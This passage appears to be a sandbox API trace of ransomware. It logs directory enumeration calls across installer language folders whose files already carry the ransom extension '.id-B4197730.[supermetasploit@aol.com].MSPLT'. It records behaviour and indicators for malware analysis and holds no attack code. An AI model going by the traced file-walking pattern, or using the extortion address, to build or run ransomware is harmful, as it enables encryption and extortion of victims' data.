ftLastAccessTime.dwLowDateTime=0x59f90d55, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5a0294f3, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x4458, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="SETUPR~1.MSP")) returned 1 [0283.671] FindNextFileW (in: hFindFile=0x48a1b0, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x59f90d55, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x59f90d55, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5a0294f3, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x4458, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="SETUPR~1.MSP")) returned 0 [0283.671] FindClose (in: hFindFile=0x48a1b0 | out: hFindFile=0x48a1b0) returned 1 [0283.672] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4014e00 | out: hHeap=0x470000) returned 1 [0283.672] FindNextFileW (in: hFindFile=0x48a8b0, lpFindFileData=0x2e8fa7c | out: lpFindFileData=0x2e8fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x59f712d4, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x59f712d4, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="1028", cAlternateFileName="")) returned 1 [0283.672] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xfffe) returned 0x4014e00 [0283.672] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1028\\*", lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x59f712d4, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x59f712d4, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x48a1b0 [0283.674] FindNextFileW (in: hFindFile=0x48a1b0, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x59f712d4, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x59f712d4, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0283.674] FindNextFileW (in: hFindFile=0x48a1b0, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x59b8ac04, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x59b8ac04, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x59f44f1e, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x1994, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="EULART~1.MSP")) returned 1 [0283.674] FindNextFileW (in: hFindFile=0x48a1b0, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x59d2e758, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x59d2e758, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x59d54819, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0xee96, dwReserved0=0x0, dwReserved1=0x0, cFileName="LocalizedData.xml.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="LOCALI~1.MSP")) returned 1 [0283.674] FindNextFileW (in: hFindFile=0x48a1b0, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5a0033b8, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x5a0033b8, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5a0033b8, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x3858, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="SETUPR~1.MSP")) returned 1 [0283.674] FindNextFileW (in: hFindFile=0x48a1b0, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5a0033b8, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x5a0033b8, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5a0033b8, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x3858, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="SETUPR~1.MSP")) returned 0 [0283.674] FindClose (in: hFindFile=0x48a1b0 | out: hFindFile=0x48a1b0) returned 1 [0283.676] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4014e00 | out: hHeap=0x470000) returned 1 [0283.676] FindNextFileW (in: hFindFile=0x48a8b0, lpFindFileData=0x2e8fa7c | out: lpFindFileData=0x2e8fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x59e13571, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x59e13571, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="1029", cAlternateFileName="")) returned 1 [0283.676] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xfffe) returned 0x4014e00 [0283.676] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1029\\*", lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x59e13571, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x59e13571, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x48a1b0 [0283.677] FindNextFileW (in: hFindFile=0x48a1b0, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x59e13571, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x59e13571, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0283.677] FindNextFileW (in: hFindFile=0x48a1b0, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x59d7a9ee, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x59d7a9ee, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x59d7a9ee, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0xf74, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="EULART~1.MSP")) returned 1 [0283.677] FindNextFileW (in: hFindFile=0x48a1b0, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x59ded2ec, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x59ded2ec, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x59ded2ec, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x13d46, dwReserved0=0x0, dwReserved1=0x0, cFileName="LocalizedData.xml.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="LOCALI~1.MSP")) returned 1 [0283.678] FindNextFileW (in: hFindFile=0x48a1b0, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5a0294f3, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x5a0294f3, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5a04f7b3, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x4858, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="SETUPR~1.MSP")) returned 1 [0283.678] FindNextFileW (in: hFindFile=0x48a1b0, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5a0294f3, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x5a0294f3, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5a04f7b3, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x4858, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="SETUPR~1.MSP")) returned 0 [0283.678] FindClose (in: hFindFile=0x48a1b0 | out: hFindFile=0x48a1b0) returned 1 [0283.833] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4014e00 | out: hHeap=0x470000) returned 1 [0283.833] FindNextFileW (in: hFindFile=0x48a8b0, lpFindFileData=0x2e8fa7c | out: lpFindFileData=0x2e8fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x59e396ae, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x59e396ae, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="1030", cAlternateFileName="")) returned 1 [0283.833] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xfffe) returned 0x4014d58 [0283.833] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1030\\*", lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x59e396ae, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x59e396ae, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3947d68 [0283.835] FindNextFileW (in: hFindFile=0x3947d68, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x59e396ae, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x59e396ae, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0283.835] FindNextFileW (in: hFindFile=0x3947d68, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x59e13571, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x59e13571, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x59e13571, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0xde4, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="EULART~1.MSP")) returned 1 [0283.835] FindNextFileW (in: hFindFile=0x3947d68, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x59e396ae, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x59e396ae, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x59e396ae, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x130b6, dwReserved0=0x0, dwReserved1=0x0, cFileName="LocalizedData.xml.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="LOCALI~1.MSP")) returned 1 [0283.835] FindNextFileW (in: hFindFile=0x3947d68, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5a28baaa, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x5a28baaa, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5a2b1e4c, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x4858, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="SETUPR~1.MSP")) returned 1 [0283.835] FindNextFileW (in: hFindFile=0x3947d68, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5a28baaa, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x5a28baaa, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5a2b1e4c, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x4858, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="SETUPR~1.MSP")) returned 0 [0283.835] FindClose (in: hFindFile=0x3947d68 | out: hFindFile=0x3947d68) returned 1 [0283.836] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4014d58 | out: hHeap=0x470000) returned 1 [0283.836] FindNextFileW (in: hFindFile=0x48a8b0, lpFindFileData=0x2e8fa7c | out: lpFindFileData=0x2e8fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x5a09bbd7, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5a09bbd7, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="1031", cAlternateFileName="")) returned 1 [0283.836] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xfffe) returned 0x4014d58 [0283.837] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1031\\*", lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x5a09bbd7, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5a09bbd7, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3947f68 [0283.838] FindNextFileW (in: hFindFile=0x3947f68, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x5a09bbd7, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5a09bbd7, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0283.838] FindNextFileW (in: hFindFile=0x3947f68, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5a09bbd7, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x5a09bbd7, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5a1a6d8f, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0xe44, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="EULART~1.MSP")) returned 1 [0283.838] FindNextFileW (in: hFindFile=0x3947f68, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x59e85ba4, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x59e85ba4, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x59e85ba4, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x142a6, dwReserved0=0x0, dwReserved1=0x0, cFileName="LocalizedData.xml.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="LOCALI~1.MSP")) returned 1 [0283.838] FindNextFileW (in: hFindFile=0x3947f68, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5a2b1e4c, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x5a2b1e4c, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5a2d7ff4, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x4a58, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="SETUPR~1.MSP")) returned 1 [0283.838] FindNextFileW (in: hFindFile=0x3947f68, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5a2b1e4c, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x5a2b1e4c, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5a2d7ff4, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x4a58, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="SETUPR~1.MSP")) returned 0 [0283.838] FindClose (in: hFindFile=0x3947f68 | out: hFindFile=0x3947f68) returned 1 [0283.840] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4014d58 | out: hHeap=0x470000) returned 1 [0283.840] FindNextFileW (in: hFindFile=0x48a8b0, lpFindFileData=0x2e8fa7c | out: lpFindFileData=0x2e8fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x5a6e59a8, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5a6e59a8, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="1032", cAlternateFileName="")) returned 1 [0283.840] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xfffe) returned 0x4014d58 [0283.840] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1032\\*", lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x5a6e59a8, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5a6e59a8, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3947da8 [0283.841] FindNextFileW (in: hFindFile=0x3947da8, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x5a6e59a8, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5a6e59a8, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0283.841] FindNextFileW (in: hFindFile=0x3947da8, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5a1347e3, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x5a1347e3, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5a66b8c8, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x2394, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="EULART~1.MSP")) returned 1 [0283.841] FindNextFileW (in: hFindFile=0x3947da8, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5a691966, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x5a691966, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5a6b7b0d, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x15206, dwReserved0=0x0, dwReserved1=0x0, cFileName="LocalizedData.xml.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="LOCALI~1.MSP")) returned 1 [0283.841] FindNextFileW (in: hFindFile=0x3947da8, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5ab56512, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x5ab56512, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5ad92818, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x4c58, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="SETUPR~1.MSP")) returned 1 [0283.841] FindNextFileW (in: hFindFile=0x3947da8, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5ab56512, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x5ab56512, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5ad92818, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x4c58, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="SETUPR~1.MSP")) returned 0 [0283.842] FindClose (in: hFindFile=0x3947da8 | out: hFindFile=0x3947da8) returned 1 [0283.843] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4014d58 | out: hHeap=0x470000) returned 1 [0283.843] FindNextFileW (in: hFindFile=0x48a8b0, lpFindFileData=0x2e8fa7c | out: lpFindFileData=0x2e8fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x5a23f672, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5a23f672, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="1033", cAlternateFileName="")) returned 1 [0283.843] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xfffe) returned 0x4014d58 [0283.843] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1033\\*", lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x5a23f672, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5a23f672, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3947d28 [0283.844] FindNextFileW (in: hFindFile=0x3947d28, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x5a23f672, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5a23f672, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0283.844] FindNextFileW (in: hFindFile=0x3947d28, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5a1ccf1e, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x5a1ccf1e, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5a1f3140, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0xd64, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="EULART~1.MSP")) returned 1 [0283.844] FindNextFileW (in: hFindFile=0x3947d28, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5a1f3140, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x5a1f3140, ftLastAccessTime.dwHighDateTime=0x1d6097d, 